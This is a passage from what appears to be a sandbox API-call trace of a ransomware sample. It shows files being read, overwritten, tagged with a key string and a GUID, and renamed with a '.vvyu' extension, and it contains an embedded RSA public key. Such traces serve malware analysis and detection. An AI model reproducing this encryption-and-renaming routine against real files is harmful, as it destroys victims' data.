StringUuid=0x2f9fa40) returned 0x0 [0198.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.596] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0198.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7950) returned 0x2af7168 [0198.597] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0198.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0198.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0198.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeac80 [0198.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6908 [0198.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeacc8 [0198.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6920 [0198.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6950 [0198.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69b0 [0198.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6968 [0198.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0198.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0198.598] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0198.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0198.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6950 | out: hHeap=0x2c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6968 | out: hHeap=0x2c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69b0 | out: hHeap=0x2c0000) returned 1 [0198.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0198.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69b0 [0198.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0198.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6968 [0198.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0198.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6950 [0198.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0198.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0198.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0198.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0198.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0198.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0198.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0198.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6968 | out: hHeap=0x2c0000) returned 1 [0198.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6950 | out: hHeap=0x2c0000) returned 1 [0198.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69b0 | out: hHeap=0x2c0000) returned 1 [0198.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0198.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0198.601] GetCurrentThreadId () returned 0x5d8 [0198.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0198.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af54e0 [0198.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0198.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0198.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0198.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.602] GetCurrentThreadId () returned 0x5d8 [0198.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0198.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0198.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0198.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0198.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69b0 [0198.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0198.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0198.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0198.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6950 [0198.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0198.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0198.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0198.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0198.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6968 [0198.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0198.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0198.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0198.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6938 [0198.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0198.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69c8 [0198.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0198.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6998 [0198.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6980 [0198.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69e0 [0198.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6980 | out: hHeap=0x2c0000) returned 1 [0198.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6980 [0198.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6998 | out: hHeap=0x2c0000) returned 1 [0198.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0198.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0198.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0198.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6950 | out: hHeap=0x2c0000) returned 1 [0198.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6950 [0198.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0198.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69b0 | out: hHeap=0x2c0000) returned 1 [0198.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0198.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69e0 | out: hHeap=0x2c0000) returned 1 [0198.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0198.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0198.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0198.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6950 | out: hHeap=0x2c0000) returned 1 [0198.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0198.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0198.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0198.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0198.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0198.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0198.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6980 | out: hHeap=0x2c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69c8 | out: hHeap=0x2c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6968 | out: hHeap=0x2c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6938 | out: hHeap=0x2c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0198.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6920 | out: hHeap=0x2c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeacc8 | out: hHeap=0x2c0000) returned 1 [0198.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0198.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0198.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0198.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0198.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0198.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.614] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0x794c, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0x794c, lpOverlapped=0x0) returned 1 [0198.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0198.614] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x7951, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.615] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0198.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0198.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0198.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0198.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0198.616] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0198.617] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.617] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.617] CloseHandle (hObject=0x584) returned 1 [0198.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0198.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0198.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0198.619] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\CelE9.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\cele9.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\CelE9.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\cele9.swf.vvyu")) returned 1 [0198.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.621] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0198.624] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc81e3920, ftCreationTime.dwHighDateTime=0x1d89b81, ftLastAccessTime.dwLowDateTime=0x475d9a40, ftLastAccessTime.dwHighDateTime=0x1d89fc5, ftLastWriteTime.dwLowDateTime=0x475d9a40, ftLastWriteTime.dwHighDateTime=0x1d89fc5, nFileSizeHigh=0x0, nFileSizeLow=0x17612, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CJrDuvoUsoi.swf", cAlternateFileName="CJRDUV~1.SWF")) returned 1 [0198.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0198.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.624] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\CJrDuvoUsoi.swf") returned=".swf" [0198.625] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\CJrDuvoUsoi.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\cjrduvousoi.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0198.625] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=95762) returned 1 [0198.625] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0198.629] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x175ec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.629] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.631] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.631] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x17612, lpOverlapped=0x0) returned 1 [0198.632] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0198.632] lstrlenA (lpString="-----BEGIN PUBLIC 